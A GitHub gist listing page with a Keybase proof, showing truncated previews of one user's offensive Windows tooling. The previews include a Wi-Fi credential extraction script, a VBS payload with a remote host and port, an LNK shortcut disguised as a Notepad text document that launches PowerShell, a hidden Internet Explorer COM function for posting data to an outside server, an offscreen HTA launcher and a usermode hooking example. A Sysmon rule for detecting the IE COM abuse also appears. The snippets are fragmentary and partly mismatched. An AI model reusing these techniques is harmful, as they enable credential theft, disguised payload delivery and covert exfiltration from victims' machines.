Keybase proof

I hereby claim:

  • I am leoloobeek on github.
  • I am leoloobeek (https://keybase.io/leoloobeek) on keybase.
  • I have a public key ASCyIsv1dP110VtA9CuMQ7YPLZ758Seyi8O5hu_ww7ZDVgo

To claim this, I am signing this object:

@leoloobeek
leoloobeek / Extract-WiFi-Creds.ps1
Created October 3, 2017 02:14 — forked from gfoss/Extract-WiFi-Creds.ps1
Simple script to extract locally-stored Wi-Fi Credentials
#====================================#
# Extract Wi-Fi Credentials #
# greg . foss @ owasp . org #
# v0.1 -- July, 2017 #
#====================================#
# Licensed under the MIT License
<#
Function Base64Encode(sText)
dim DM, EL
Set DM = CreateObject("Microsoft.XMLDOM")
Set EL = DM.createElement("tmp")
EL.DataType = "bin.base64"
EL.NodeTypedValue = sText
Base64Encode = EL.Text
End Function
Set wmiObj=GetObject("winmgmts:{impersonationLevel=impersonate}\\.\ROOT\SecurityCenter2")
Set items = wmiObj.ExecQuery("Select * from AntiVirusProduct")
Option Explicit
dim oEncoder, oFilesToEncode, file, sDest
dim sFileOut, oFile, oEncFile, oFSO, i
dim oStream, sSourceFile
set oFilesToEncode = WScript.Arguments
set oEncoder = CreateObject("Scripting.Encoder")
For i = 0 to oFilesToEncode.Count - 1
set oFSO = CreateObject("Scripting.FileSystemObject")
@leoloobeek
leoloobeek / Command.vbs
Created November 6, 2017 23:14 — forked from staaldraad/Command.vbs
Using VBSMeter with Ruler
Call X()
End Function
Dim RHOST: RHOST = "x.x.x.x"
Dim RPORT: RPORT = "8999"
Function Base64ToStream(b)
Dim enc, length, ba, transform, ms
Set enc = CreateObject("System.Text.ASCIIEncoding")
length = enc.GetByteCount_2(b)
@leoloobeek
leoloobeek / LNK-creator.ps1
Created December 6, 2017 17:25
Create LNK file
$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut($env:USERPROFILE + "\Desktop\MaliciousLink.lnk")
$ShortCut.Arguments = " -W 1 -command ....."
$ShortCut.TargetPath = "powershell"
$ShortCut.IconLocation = "C:\Windows\System32\notepad.exe, 0";
$ShortCut.Description = "Type: Text Document";
$ShortCut.Save()
@leoloobeek
leoloobeek / ie_com.cs
Last active July 21, 2023 13:07
InternetExplorer.Application PoC's
// sample function that takes in a destination server, POST data, and custom HTTP request headers
private string SendData(string dst, byte[] postData, string customHeaders)
{
Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046"));
object IE = Activator.CreateInstance(com_type);
object[] falseArr = new object[] { false };
object[] trueArr = new object[] { true };
com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr);
com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr);
@leoloobeek
leoloobeek / example.hta
Last active July 24, 2023 00:39
HTA example for
<html>
<head>
<script language="JScript">
// HTA skeleton taken from https://github.com/zerosum0x0/koadic
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();
try
{
@leoloobeek
leoloobeek / sysmon-config.xml
Created December 19, 2017 17:36
Sysmon log loading of ieproxy.dll for detecting IE COM abuse
<!--SYSMON EVENT ID 7 : DLL (IMAGE) LOADED BY PROCESS-->
<!--DATA: UtcTime, ProcessGuid, ProcessId, Image, ImageLoaded, Hashes, Signed, Signature, SignatureStatus-->
<ImageLoad onmatch="include">
<ImageLoaded condition="end with">ieproxy.dll</ImageLoaded>
</ImageLoad>
<ImageLoad onmatch="exclude">
<Image condition="is">C:\Program Files (x86)\Internet Explorer\iexplore.exe</Image>
<Image condition="is">C:\Program Files\internet explorer\iexplore.exe</Image>
<Image condition="is">C:\Program Files (x86)\Internet Explorer\ielowutil.exe</Image>
<Image condition="is">C:\Program Files\internet explorer\ielowutil.exe</Image>
@leoloobeek
leoloobeek / Injectable.cpp
Created December 19, 2017 18:37 — forked from anonymous/Injectable.cpp
Simple UserMode Hook Example
#include <windows.h>
#include <stdio.h>
FARPROC fpCreateProcessW;
BYTE bSavedByte;
// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// tasklist | findstr explore.exe